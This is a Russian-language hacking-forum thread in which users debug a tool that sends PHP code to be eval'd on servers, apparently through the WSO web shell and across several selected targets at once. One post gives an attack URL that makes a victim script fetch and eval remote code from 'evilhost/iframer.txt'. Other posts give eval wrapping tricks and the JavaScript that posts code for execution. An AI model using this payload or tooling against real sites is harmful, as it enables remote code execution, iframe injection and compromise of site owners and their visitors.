Старый 23.09.2012, 21:14   #11
EnDoR
 
Регистрация: 01.04.2012
Сообщений: 12
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
$_POST['code'] у тебя дикая хрень, закрывай тему и учи php

ЗАКОН: Всё, что сработает из обычного отдельного файла, сработает и в Execution PHP-code в wso, только без <? в начале

На самом деле Вы поторопились с выводами))Код полностью рабочий...
EnDoR вне форума   Ответить с цитированием
Старый 23.09.2012, 21:21   #12
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Братан, если у тебя работает phpinfo, то и ЛЮБОЙ другой код (тем более тот, что ты скинул в личку), будет работать, если его написть ПРАВИЛЬНО. Советую отталкиваться от этого
Pashkela вне форума   Ответить с цитированием
Старый 23.09.2012, 21:27   #13
EnDoR
 
Регистрация: 01.04.2012
Сообщений: 12
Репутация: 0
По умолчанию

Согласен,что ситуация парадоксальна...Вообщем сниму я видео и сами всё увидите=)выложу послезавтра примерно
EnDoR вне форума   Ответить с цитированием
Старый 23.09.2012, 21:39   #14
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Согласен,что ситуация парадоксальна
пародоксальны твои выводы, ситуация-то как раз обычная) Просто следуй логике. А вообще молодец, хорошая эмпатия
Pashkela вне форума   Ответить с цитированием
Старый 24.09.2012, 17:32   #15
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

http://victimhost/badscript.php?code=eval(file_get_contents('http://evilhost/iframer.txt'));
Ereeee вне форума   Ответить с цитированием
Старый 24.09.2012, 19:55   #16
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Были проблему подобного хакактера, только у меня все это дело еще и в base64 было. При евле ругался то на Т_СПЕЙС, то на $end. Помогло добавление '?>' к евалу, и '<?php' к самому коду + перевод всего кода в другую кодировку. Вот не могу только вспомнить, то ли в UTF-8 из вин перегонял, толи обратно. Но как факт - заработало)
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 24.09.2012, 20:30   #17
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

была как то проблема, возможно сходная с проблемой ТС и m0Hze.
выкрутился так:
eval("?><?php ".$code." ?>");
DrakonHaSh вне форума   Ответить с цитированием
Старый 03.10.2012, 00:49   #18
EnDoR
 
Регистрация: 01.04.2012
Сообщений: 12
Репутация: 0
По умолчанию

Ребят,вообщем проблема после ряда экспериментов и отладочных работ всё-таки прояснилась...не знаю каким образом,но дело оказалось в ajax!Сделал через document.formname.submit(),правда с перезагрузкой страницы и теперь всё пашет...

Вообще очень интересный момент,что при ajax некоторые коды успешно проходят eval,а другие же-нет!
Мне кажется,что дело как-то связано с getelementbyid,но вообще точно неясно.
Вот пример бажного кода,что-то проходило eval,а что-то нет!Вообщем вот:
PHP код:
function stat(){
        
    var 
checkBoxs = [];

    
elems document.getElementsByTagName('input');
    for (
i=0;i<elems.length;i++){
        if (
elems[i].type == 'checkbox'){
            if (
elems[i].checked) {
           
checkBoxs.push(elems[i].value);
            }
        }
    }    
   var 
x=document.getElementById('Code').value;
   
   
xhttp=new XMLHttpRequest();
   
xhttp.onreadystatechange=function(){
      if (
xhttp.readyState==&& xhttp.status==200)
         
document.getElementById('ajax').innerHTML=xhttp.responseText;
      }
   
xhttp.open('POST','exer.php',true);
   
xhttp.setRequestHeader('Content-type''application/x-www-form-urlencoded');
   var 
str='do=exec&code='+x+'&id='+checkBoxs.join();
   
xhttp.send(str);

Когда начинал писать код,то про jquery имел самые смутные представления,теперь такой длинный код уже не пишу,а использую jquery.Замечательная вещь между прочим,раньше думал что на php что угодно могу написать и хватит,а теперь понял,что ошибался=)Javascript очень мощный язык...
На этой ноте тему можно за-кры-вать!=)
EnDoR вне форума   Ответить с цитированием
Старый 03.10.2012, 01:16   #19
chupakabra
 
Аватар для chupakabra
 
Регистрация: 09.12.2011
Сообщений: 47
Репутация: 5
По умолчанию

Цитата:
var str='do=exec&code='+x+'&id='+checkBoxs.join();
urlencode надо делать (escape() / encodeURI() / encodeURIComponent())

Последний раз редактировалось chupakabra; 03.10.2012 в 01:19..
chupakabra вне форума   Ответить с цитированием
Старый 04.10.2012, 15:29   #20
EnDoR
 
Регистрация: 01.04.2012
Сообщений: 12
Репутация: 0
По умолчанию

Цитата:
Сообщение от chupakabra Посмотреть сообщение
urlencode надо делать (escape() / encodeURI() / encodeURIComponent())

Поставил escape() и теперь в ajax-режиме тоже заработало.Спасибо большое,chupakabra!

P.S И опыт-сын ошибок трудных=)
EnDoR вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot